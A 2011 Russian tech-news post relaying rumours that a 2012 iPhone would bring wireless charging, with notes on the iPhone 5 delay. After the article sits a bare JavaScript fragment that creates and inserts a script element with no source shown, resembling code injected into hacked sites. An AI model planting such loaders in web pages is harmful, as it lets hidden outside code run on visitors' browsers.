Apple экспериментирует с «новым способом зарядки» iPnone 2012

07.07.2011, Слухи, Кирилл Месяц

Технология беспроводной зарядки HP’s Touchstone

В своем недавнем сообщении Wall Street Journal называет iPhone 5 более тонким и легким устройством с 8-мегапиксельной камером, но с дизайном, очень похожим на таковой в iPhone 4. Теперь в новом докладе известная газета утверждает, что Apple уже работает над шестым поколением яблочного смартфона. Телефон, который будет запущен ориентировочно в 2012 году будет иметь «новый способ зарядки».

Этот «новый способ зарядки»  невольно заставляет вспомнить доклад This is my next, в котором утверждалось, чо компания Apple уже вплотную работает над реконструкцией iPhone. В этом сообщении говорится о тонком устройстве с 3,7 дюймовом Retina дисплее, об основанной на жесте кнопке home и о «беспроводной зарядке». Возможно, это новый способ зарядки подобный тому, которая использует HP в своей webOS. Весьма вероятно также, что другие нововведения, которые обсуждались в посте This is my next, появятся в шестом поколении iPhone.

Кроме того, WSJ по-прежнему утверждает, что Apple работает над более дешевым iPhone с дисплеем «от края до края». Причиной, по которой запуск iPhone 5 был отложен до конца сентября, WSJ называет неготовность оборудования к летнему релизу смартфона, тем самым расходясь мнениями с компанией Bloomberg, которая говорит о неготовности iOS 5.

Некто сообщил о планах компании Apple, сказав что компания изначально собиралась запустить новый iPhone летом этого года, как обычно она это и делала, но устройство было неготово в срок.

Ожидается, что iPhone пятого поколения будет оснащен двухъядерным процессором A5 (таким же как и в iPad 2), и новым сотовым чипом Qualcomm, который позволит использовать телефон как в GSM, так и в CDMA сетях.

var d=document;var s=d.createElement(‘script’);

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Читайте также:

  1. Продажи iPad сделают Apple к 2012 году крупнейшим поставщиком мобильных PC

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.